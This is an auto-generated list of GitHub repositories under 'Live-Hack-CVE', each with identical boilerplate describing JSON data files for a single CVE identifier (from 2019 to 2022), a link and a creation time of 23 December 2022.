**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4084](https://github.com/Live-Hack-CVE/CVE-2019-4084) create time: 2022-12-23T03:18:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4134 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4134](https://github.com/Live-Hack-CVE/CVE-2019-4134) create time: 2022-12-23T03:17:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4086 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4086](https://github.com/Live-Hack-CVE/CVE-2019-4086) create time: 2022-12-23T03:17:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4115](https://github.com/Live-Hack-CVE/CVE-2019-4115) create time: 2022-12-23T03:17:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4109](https://github.com/Live-Hack-CVE/CVE-2019-4109) create time: 2022-12-23T03:17:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4112 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4112](https://github.com/Live-Hack-CVE/CVE-2019-4112) create time: 2022-12-23T03:17:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4106](https://github.com/Live-Hack-CVE/CVE-2019-4106) create time: 2022-12-23T03:17:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4057](https://github.com/Live-Hack-CVE/CVE-2019-4057) create time: 2022-12-23T03:13:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4087](https://github.com/Live-Hack-CVE/CVE-2019-4087) create time: 2022-12-23T03:13:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4088](https://github.com/Live-Hack-CVE/CVE-2019-4088) create time: 2022-12-23T03:13:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4129](https://github.com/Live-Hack-CVE/CVE-2019-4129) create time: 2022-12-23T03:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4133](https://github.com/Live-Hack-CVE/CVE-2019-4133) create time: 2022-12-23T02:59:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4132](https://github.com/Live-Hack-CVE/CVE-2019-4132) create time: 2022-12-23T02:59:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4116](https://github.com/Live-Hack-CVE/CVE-2019-4116) create time: 2022-12-23T02:59:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4117](https://github.com/Live-Hack-CVE/CVE-2019-4117) create time: 2022-12-23T02:59:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4120](https://github.com/Live-Hack-CVE/CVE-2019-4120) create time: 2022-12-23T02:59:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4054 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4054](https://github.com/Live-Hack-CVE/CVE-2019-4054) create time: 2022-12-23T02:59:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4118](https://github.com/Live-Hack-CVE/CVE-2019-4118) create time: 2022-12-23T02:59:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4048](https://github.com/Live-Hack-CVE/CVE-2019-4048) create time: 2022-12-23T02:59:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4047](https://github.com/Live-Hack-CVE/CVE-2019-4047) create time: 2022-12-23T02:59:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4076](https://github.com/Live-Hack-CVE/CVE-2019-4076) create time: 2022-12-23T02:59:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4077 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4077](https://github.com/Live-Hack-CVE/CVE-2019-4077) create time: 2022-12-23T02:59:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4092](https://github.com/Live-Hack-CVE/CVE-2019-4092) create time: 2022-12-23T02:58:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4071 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4071](https://github.com/Live-Hack-CVE/CVE-2019-4071) create time: 2022-12-23T02:58:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4069](https://github.com/Live-Hack-CVE/CVE-2019-4069) create time: 2022-12-23T02:57:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4056 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4056](https://github.com/Live-Hack-CVE/CVE-2019-4056) create time: 2022-12-23T02:57:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4068 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4068](https://github.com/Live-Hack-CVE/CVE-2019-4068) create time: 2022-12-23T02:57:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4078](https://github.com/Live-Hack-CVE/CVE-2019-4078) create time: 2022-12-23T02:57:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11511](https://github.com/Live-Hack-CVE/CVE-2020-11511) create time: 2022-12-23T03:14:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24870](https://github.com/Live-Hack-CVE/CVE-2020-24870) create time: 2022-12-23T02:57:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36430 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36430](https://github.com/Live-Hack-CVE/CVE-2020-36430) create time: 2022-12-23T02:57:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43543](https://github.com/Live-Hack-CVE/CVE-2021-43543) create time: 2022-12-23T03:18:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43545](https://github.com/Live-Hack-CVE/CVE-2021-43545) create time: 2022-12-23T03:18:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43537 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43537](https://github.com/Live-Hack-CVE/CVE-2021-43537) create time: 2022-12-23T03:18:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38503 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38503](https://github.com/Live-Hack-CVE/CVE-2021-38503) create time: 2022-12-23T03:18:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38509 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38509](https://github.com/Live-Hack-CVE/CVE-2021-38509) create time: 2022-12-23T03:18:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40529](https://github.com/Live-Hack-CVE/CVE-2021-40529) create time: 2022-12-23T03:17:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38504](https://github.com/Live-Hack-CVE/CVE-2021-38504) create time: 2022-12-23T03:17:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43528](https://github.com/Live-Hack-CVE/CVE-2021-43528) create time: 2022-12-23T03:17:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38506](https://github.com/Live-Hack-CVE/CVE-2021-38506) create time: 2022-12-23T03:17:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38508](https://github.com/Live-Hack-CVE/CVE-2021-38508) create time: 2022-12-23T03:16:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43542](https://github.com/Live-Hack-CVE/CVE-2021-43542) create time: 2022-12-23T03:16:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43536](https://github.com/Live-Hack-CVE/CVE-2021-43536) create time: 2022-12-23T03:15:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38507](https://github.com/Live-Hack-CVE/CVE-2021-38507) create time: 2022-12-23T03:15:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43539 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43539](https://github.com/Live-Hack-CVE/CVE-2021-43539) create time: 2022-12-23T03:15:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43538 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43538](https://github.com/Live-Hack-CVE/CVE-2021-43538) create time: 2022-12-23T03:14:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24485](https://github.com/Live-Hack-CVE/CVE-2021-24485) create time: 2022-12-23T03:14:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43541](https://github.com/Live-Hack-CVE/CVE-2021-43541) create time: 2022-12-23T03:14:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24356](https://github.com/Live-Hack-CVE/CVE-2021-24356) create time: 2022-12-23T03:14:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24355](https://github.com/Live-Hack-CVE/CVE-2021-24355) create time: 2022-12-23T03:14:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43331](https://github.com/Live-Hack-CVE/CVE-2021-43331) create time: 2022-12-23T03:14:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43332](https://github.com/Live-Hack-CVE/CVE-2021-43332) create time: 2022-12-23T03:14:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44227](https://github.com/Live-Hack-CVE/CVE-2021-44227) create time: 2022-12-23T03:13:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22959](https://github.com/Live-Hack-CVE/CVE-2021-22959) create time: 2022-12-23T03:13:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40905](https://github.com/Live-Hack-CVE/CVE-2021-40905) create time: 2022-12-23T03:12:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36338](https://github.com/Live-Hack-CVE/CVE-2021-36338) create time: 2022-12-23T03:12:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41556](https://github.com/Live-Hack-CVE/CVE-2021-41556) create time: 2022-12-23T03:12:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43818](https://github.com/Live-Hack-CVE/CVE-2021-43818) create time: 2022-12-23T03:12:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45926](https://github.com/Live-Hack-CVE/CVE-2021-45926) create time: 2022-12-23T03:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45927 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45927](https://github.com/Live-Hack-CVE/CVE-2021-45927) create time: 2022-12-23T03:12:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39317](https://github.com/Live-Hack-CVE/CVE-2021-39317) create time: 2022-12-23T03:12:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3656](https://github.com/Live-Hack-CVE/CVE-2022-3656) create time: 2022-12-23T03:18:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3317](https://github.com/Live-Hack-CVE/CVE-2022-3317) create time: 2022-12-23T03:17:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3444](https://github.com/Live-Hack-CVE/CVE-2022-3444) create time: 2022-12-23T03:17:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3443 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3443](https://github.com/Live-Hack-CVE/CVE-2022-3443) create time: 2022-12-23T03:17:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37061](https://github.com/Live-Hack-CVE/CVE-2022-37061) create time: 2022-12-23T03:16:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3653](https://github.com/Live-Hack-CVE/CVE-2022-3653) create time: 2022-12-23T03:16:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3652](https://github.com/Live-Hack-CVE/CVE-2022-3652) create time: 2022-12-23T03:16:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3655](https://github.com/Live-Hack-CVE/CVE-2022-3655) create time: 2022-12-23T03:16:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3654](https://github.com/Live-Hack-CVE/CVE-2022-3654) create time: 2022-12-23T03:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3304](https://github.com/Live-Hack-CVE/CVE-2022-3304) create time: 2022-12-23T03:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3318](https://github.com/Live-Hack-CVE/CVE-2022-3318) create time: 2022-12-23T03:16:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3307 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3307](https://github.com/Live-Hack-CVE/CVE-2022-3307) create time: 2022-12-23T03:16:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3306 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3306](https://github.com/Live-Hack-CVE/CVE-2022-3306) create time: 2022-12-23T03:16:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3305](https://github.com/Live-Hack-CVE/CVE-2022-3305) create time: 2022-12-23T03:16:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3308 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3308](https://github.com/Live-Hack-CVE/CVE-2022-3308) create time: 2022-12-23T03:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3310](https://github.com/Live-Hack-CVE/CVE-2022-3310) create time: 2022-12-23T03:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3309](https://github.com/Live-Hack-CVE/CVE-2022-3309) create time: 2022-12-23T03:15:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3316](https://github.com/Live-Hack-CVE/CVE-2022-3316) create time: 2022-12-23T03:15:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3311](https://github.com/Live-Hack-CVE/CVE-2022-3311) create time: 2022-12-23T03:15:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45499](https://github.com/Live-Hack-CVE/CVE-2022-45499) create time: 2022-12-23T03:14:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32275](https://github.com/Live-Hack-CVE/CVE-2022-32275) create time: 2022-12-23T03:14:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2085](https://github.com/Live-Hack-CVE/CVE-2022-2085) create time: 2022-12-23T03:13:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31101](https://github.com/Live-Hack-CVE/CVE-2022-31101) create time: 2022-12-23T03:13:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24281](https://github.com/Live-Hack-CVE/CVE-2022-24281) create time: 2022-12-23T03:13:47Z

